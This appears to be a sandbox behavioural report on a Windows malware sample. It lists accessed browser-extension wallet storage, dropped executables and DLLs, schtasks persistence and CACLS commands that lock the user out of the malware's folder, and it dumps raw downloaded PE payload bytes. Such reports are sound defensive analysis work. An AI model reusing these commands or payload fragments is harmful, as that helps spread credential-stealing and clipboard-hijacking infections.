file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno

Creates executable files on the filesystem (33 events)

file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Iu4ZR7oE.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\rAl2Hl1fQTa[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\CdEEViHRUhC[1].js
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\Fa2Qm8Fk.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\4Pj006nP.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\3cO2ru13.exe
file	C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\IQ5MD6nz.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\v2fcQEWFLez[1].js
file	C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5um56Yn.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Ko7QU72.exe
file	C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe
file	C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\5Pm74xE.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe
file	C:\Users\test22\AppData\Local\Temp\1000030041\2.ps1
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\2Nk190te.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Ze6Wz5Pk.exe
file	C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe
file	C:\Users\test22\AppData\Local\Temp\IXP006.TMP\1ZR81pz6.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\YG2en6hu.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\aU3Am8Em.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe
file	C:\Users\test22\AppData\Local\Temp\DgiKlTOqQDxtWuTn.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\JD9xE6RV.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\pU6oJ6OP.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4Dl351Uz.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2Au742WU.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1sR42BQ9.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\1000030041\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (10 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000030041\2.ps1"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000030041\2.ps1"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe
file	C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe
file	C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe
file	C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe

A process created a hidden window (12 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2984 thread_handle: 0x000002e0 process_identifier: 2980 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000308	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 3020 thread_handle: 0x00000310 process_identifier: 3016 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000030c	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: Powershell.exe parameters: -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000030041\2.ps1" filepath: Powershell.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:45 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:44 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe" filepath: C:\Windows\sysnative\cmd	1	1
ShellExecuteExW Oct. 16, 2023, 9:45 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe" filepath: C:\Windows\sysnative\cmd	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x036f0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process explothe.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ NrýBNrýBNrýBþCDrýBøCÁrýBùCZrýBùC_rýBþC]rýBüCKrýBNrüBÌrýBøCzrýBøCOrýBýCOrýBÿCOrýBRichNrýBPEL,eà"0 @@@´PP´<`°ð¦0¦@@ .text/0 `.rdataÞz@\|4@@.data@À °@À.palxàzº@À.reloc°`4@B¹HËAèæ h~?AèÚYÃÌÌÌÌÌÌÌÌÌÌUW\|$éÿÿÿÿwoÇEÿsWÿt$}UèvÄ_]ÂSßËVûÿÿÿv»ÿÿÿë ¸;ØBØCPèWÿt$ð}Vu]è/ÄÆ>^[_]ÂèLÌÌÌÌÌÌÌÌÌÌÌÌVñWÀFPÇAAfÖD$ÀPèôÄÇ¨AAÆ^ÂVñWÀFPÇAAfÖD$ÀPèÄÄÇ´AAÆ^ÂWÀÁfÖAÇA¼AAÇ´AAÃÌÌÌÌÌÌÌÌVñWÀFPÇAAfÖD$ÀPètÄÆ^ÂÌÌÌÌÌÌAÇAAPè¹YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVñFÇAAPèÄöD$tjVèó ÄÆ^ÂÌÌÌSÜìäðÄUkl$ììØ¡ÀA3ÅEüVWutè¶h¶säÿ5XBè"WÀEhÈÿ5XBf,ÿÿÿf4ÿÿÿf<ÿÿÿfDÿÿÿfLÿÿÿfTÿÿÿf\ÿÿÿfdÿÿÿèÌE¤WÀ¡<àAÄ)EE¬Ç(ÿÿÿDÇE3ÀtèÂðAAf¡(BA}°fEèÇþE°BAEÀBAEÐó~ BAfÖEàffGÇfÀuôE¹P(ÿÿÿ¾0BAPjjjjjjjE°ó¥PÿUÀÁsré_h'&e{ÿ5XBè ÄE¨rséOjhjjjÿÿÐøh©Åð¿}Çÿ5XBèÔhRÃÿ5XBðèÂÄxÿÿÿsré¤WÿuÿÖÀFÀuéõh2«ð®ÿ5XBèÄtÿÿÿjjQ¤ÁQÿuÿÐE¬j@h04àAÿ°PàA\|ÿÿÿÿ1ÿuÿU¨h$$Xÿ5XBðu¨è8M¬ÄEEPÿ±TàAhàAVÿuÿU¤öu jÿuÿUé[þÿÿE¬3Éf;àAsN3ö3ÿfD <àAÎjÿ±áAáAàAPáAE¨PÿuÿU¤E¬GÆ(·àA;ø\|Â}u¨¤jjÿµ\|ÿÿÿÀPÿuÿU¤M¬W(àAÆ°ÿuÿxÿÿÿh´.Öÿ5XBègÄÿuÿÐMü_3Í^èèå]ã[ÃÌÌÌÌÌÌÌÌÌÌÌÌì$è5üÿÿhPAD$Pè]ÌÌÌÌÌÌhÔAAèÌÌÌÌÌÌD$=r"H#;Èv0QèOÈÄÉt&A#ààHüÂÀtPè0ÄÂ3ÀÂèÿÿÿèC8ÌÌÌÌS\$W3ÿÛ£Ul$V5@A@jÿÖ/WjÿÖ/jÿÖ4/ jÿÖ/ªjÿÖ/jÿÖ/ájÿÖ/!jÿÖ4/¿jÿÖ/jÿÖ/UjÿÖ4/ÉjÿÖ/jÿÖ/DjÿÖ/=jÿÖ/jÿÖ/ÇjÿÖ4/\|jÿÖ/jÿÖ/ÍjÿÖ/{jÿÖ/jÿÖ/jÿÖ/jÿÖ/jÿÖ/2jÿÖ4/jÿÖ/÷jÿÖ/ÕjÿÖ//jÿÖ/jÿÖ/jÿÖ4/jÿÖ4/jÿÖ4/jÿÖ/üjÿÖ/æjÿÖ4/jÿÖ/ìjÿÖ/¤jÿÖ4/ÌjÿÖ/ejÿÖ4/®jÿÖ/,jÿÖ4/{jÿÖ/ÜjÿÖ4/jÿÖ/jÿÖ/1jÿÖ/G;ûoþÿÿ^]_[ÃÌÌÌÌÌÌÌÌÌÌì0¡ÀA3ÄD$,S\$8UV3í\$C<WÇD$LxD ËL$ ÃD$IL$ÉfDWÀÓÇD$4ÂÇD$8D$$p@Éuù+ÆL$$PRèøÿÿ\|$4\$$÷öM\|$8C\$$SÁïWhäAAèÒÄ3Òÿt*fiéÑ[BiöéÑ[ÁÁè3ÁiÈéÑ[3ñ;×\|ßD$43Éàètèt èu ¾L»Áá¾D»Áà3È¾»3ÁiÀéÑ[3ðÆÁè 3ÆiÈéÑ[ÁÁè3Á;D$HtVD$L$8ÀD$ùr1T$$AÂùrPüÁ#+ÂÀüøQRèD$Ä\$E;l$ÉþÿÿëQT$ \$B$h·BL$L$8ùr)T$$AÂùrPüÁ#+ÂÀüøw#QRè°ÄD$L$<Ã_^][3Ìè¦Ä0Ãè4ÌÌÌÌÌÌÌÌI¸AAÉEÁÃÌÌhpBAèfYÃÌÌÌÌ¸ÉAÃÌÌÌÌÌÌÌÌÌÌVW¸¡ø$wé¸ÿ@Ad=0w@£XB+ÀtéshxhàAèÎûÿÿÄè&øÿÿ_3À^ÃÌVt$jè5ÄL$QjVPèÿÿÿÿpÿ0èQÄ^ÃaÁaÇABAÇ¨AAÃUìQQEVñEøEøÆEüVÇAA"bRPèÅ YYÆ^ÉÂUìVÿuñè÷ÿÿÇ BAÆ^]ÂUìQVÿuñuüèÿÿÿÇ BAÆ^ÉÂUìVÿuñèßöÿÿÇBAÆ^]ÂUìVñFÇAAPèµ öEYt jVèYYÆ^]ÂUììMôÿuèÿÿÿhüAEôPè ÌVh$NAÿ @Aðh@NAVÿ$@AhTNAV£8ËAÿ$@AhtNAV£<ËAÿ$@A£@ËA3À^Ã3ÀWù@ðÁÀAuV¾PËAVèFÆYþÌAuî^Ç_ÃÈÿðÁÀAyV¾PËAVèÆYþÌAuî^ÃUìÿuÿ0@A]ÃUìjh ÿuÿ@A]ÃUìë ÿuèpQYÀtÿuèìQYÀtæ]Ã}ÿélUìÿuèY]Ã; ÀAuÃé·UìöEVñÇOAt jVèÊÿÿÿYYÆ^]ÂVjèæRè Pè]èðè^j0èaÄ request_handle: 0x00cc000c	1	1
InternetReadFile Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà db`j@ ¼ @Á ¢´À`CT@ .textcd `.dataHh@À.idataR j@@.rsrcPÀD\|@@.reloc À@B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ NrýBNrýBNrýBþCDrýBøCÁrýBùCZrýBùC_rýBþC]rýBüCKrýBNrüBÌrýBøCzrýBøCOrýBýCOrýBÿCOrýBRichNrýBPEL,eà"0x@@à@´PP´<À°ð¦0¦@@ .text/0 `.rdataÞz@\|4@@.data@À °@À.palÐàÒº@À.reloc°À@B¹HËAèæ h~?AèÚYÃÌÌÌÌÌÌÌÌÌÌUW\|$éÿÿÿÿwoÇEÿsWÿt$}UèvÄ_]ÂSßËVûÿÿÿv»ÿÿÿë ¸;ØBØCPèWÿt$ð}Vu]è/ÄÆ>^[_]ÂèLÌÌÌÌÌÌÌÌÌÌÌÌVñWÀFPÇAAfÖD$ÀPèôÄÇ¨AAÆ^ÂVñWÀFPÇAAfÖD$ÀPèÄÄÇ´AAÆ^ÂWÀÁfÖAÇA¼AAÇ´AAÃÌÌÌÌÌÌÌÌVñWÀFPÇAAfÖD$ÀPètÄÆ^ÂÌÌÌÌÌÌAÇAAPè¹YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVñFÇAAPèÄöD$tjVèó ÄÆ^ÂÌÌÌSÜìäðÄUkl$ììØ¡ÀA3ÅEüVWutéÄh¶säÿ5°Dè"WÀEhÈÿ5°Df,ÿÿÿf4ÿÿÿf<ÿÿÿfDÿÿÿfLÿÿÿfTÿÿÿf\ÿÿÿfdÿÿÿèÌE¤WÀ¡<àAÄ)EE¬Ç(ÿÿÿDÇE3ÀtézðAAf¡(BA}°fEèÇþE°BAEÀBAEÐó~ BAfÖEàffGÇfÀuôE¹P(ÿÿÿ¾0BAPjjjjjjjE°ó¥PÿUÀÁsréöh'&e{ÿ5°Dè ÄE¨rsè3jhjjjÿÿÐøh©Åð¿}Çÿ5°DèÔhRÃÿ5°DðèÂÄxÿÿÿsrèWÿuÿÖÀFÀuèqh2«ð®ÿ5°DèÄtÿÿÿjjQ¤ÁQÿuÿÐE¬j@h04àAÿ°PàA\|ÿÿÿÿ1ÿuÿU¨h$$Xÿ5°Dðu¨è8M¬ÄEEPÿ±TàAhàAVÿuÿU¤öu jÿuÿUé[þÿÿE¬3Éf;àAsN3ö3ÿfD <àAÎjÿ±áAáAàAPáAE¨PÿuÿU¤E¬GÆ(·àA;ø\|Â}u¨¤jjÿµ\|ÿÿÿÀPÿuÿU¤M¬W(àAÆ°ÿuÿxÿÿÿh´.Öÿ5°DègÄÿuÿÐMü_3Í^èèå]ã[ÃÌÌÌÌÌÌÌÌÌÌÌÌì$è5üÿÿhPAD$Pè]ÌÌÌÌÌÌhÔAAèÌÌÌÌÌÌD$=r"H#;Èv0QèOÈÄÉt&A#ààHüÂÀtPè0ÄÂ3ÀÂèÿÿÿèC8ÌÌÌÌS\$W3ÿÛUl$V5@A@jÿÖ/jÿÖjÿÖ4/DjÿÖ/£jÿÖ/MjÿÖ/QjÿÖ/jÿÖ4/ÄjÿÖ/jÿÖ/ÖjÿÖ4/jÿÖ/NjÿÖ/jÿÖ/ jÿÖ/÷jÿÖ/¨jÿÖ4/¶jÿÖ,/jÿÖ/·jÿÖ/`jÿÖ/jÿÖ/jÿÖ/ÌjÿÖ/ÒjÿÖ/6jÿÖ4/ÔjÿÖ/-jÿÖ/jÿÖ/ÄjÿÖ/jÿÖ/?jÿÖ4/ûjÿÖ4/ªjÿÖ4/ijÿÖ/þjÿÖ/PjÿÖ4/ijÿÖ/;jÿÖ/8jÿÖ4/_jÿÖ/ÑjÿÖ4/jÿÖ/£jÿÖ4/¬jÿÖ/ZjÿÖ4/mjÿÖ/VjÿÖ/ÈjÿÖ/qG;ûsþÿÿ^]_[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌì0¡ÀA3ÄD$,S\$8UV3í\$C<WÇD$LxD ËL$ ÃD$IL$ÉfDWÀÓÇD$4ÂÇD$8D$$p@Éuù+ÆL$$PRèøÿÿ\|$4\$$÷öM\|$8C\$$SÁïWhäAAèÒÄ3Òÿt*fiéÑ[BiöéÑ[ÁÁè3ÁiÈéÑ[3ñ;×\|ßD$43Éàètèt èu ¾L»Áá¾D»Áà3È¾»3ÁiÀéÑ[3ðÆÁè 3ÆiÈéÑ[ÁÁè3Á;D$HtVD$L$8ÀD$ùr1T$$AÂùrPüÁ#+ÂÀüøQRèD$Ä\$E;l$ÉþÿÿëQT$ \$B$h·BL$L$8ùr)T$$AÂùrPüÁ#+ÂÀüøw#QRè°ÄD$L$<Ã_^][3Ìè¦Ä0Ãè4ÌÌÌÌÌÌÌÌI¸AAÉEÁÃÌÌhpBAèfYÃÌÌÌÌ¸ÉAÃÌÌÌÌÌÌÌÌÌÌVW¸¡ø$wéÿ@Ad=0w@£°D+ÀtéYhÐhàAèÎûÿÿÄè&øÿÿ_3À^ÃÌVt$jè5ÄL$QjVPèÿÿÿÿpÿ0èQÄ^ÃaÁaÇABAÇ¨AAÃUìQQEVñEøEøÆEüVÇAA"bRPèÅ YYÆ^ÉÂUìVÿuñè÷ÿÿÇ BAÆ^]ÂUìQVÿuñuüèÿÿÿÇ BAÆ^ÉÂUìVÿuñèßöÿÿÇBAÆ^]ÂUìVñFÇAAPèµ öEYt jVèYYÆ^]ÂUììMôÿuèÿÿÿhüAEôPè ÌVh$NAÿ @Aðh@NAVÿ$@AhTNAV£8ËAÿ$@AhtNAV£<ËAÿ$@A£@ËA3À^Ã3ÀWù@ðÁÀAuV¾PËAVèFÆYþÌAuî^Ç_ÃÈÿðÁÀAyV¾PËAVèÆYþÌAuî^ÃUìÿuÿ0@A]ÃUìjh ÿuÿ@A]ÃUìë ÿuèpQYÀtÿuèìQYÀtæ]Ã}ÿélUìÿuèY]Ã; ÀAuÃé·UìöEVñÇOAt jVèÊÿÿÿYYÆ^]ÂVjèæRè Pè]èðè^j0èaÄ request_handle: 0x00cc000c	1	1
InternetReadFile Oct. 16, 2023, 9:45 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL ïeà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: 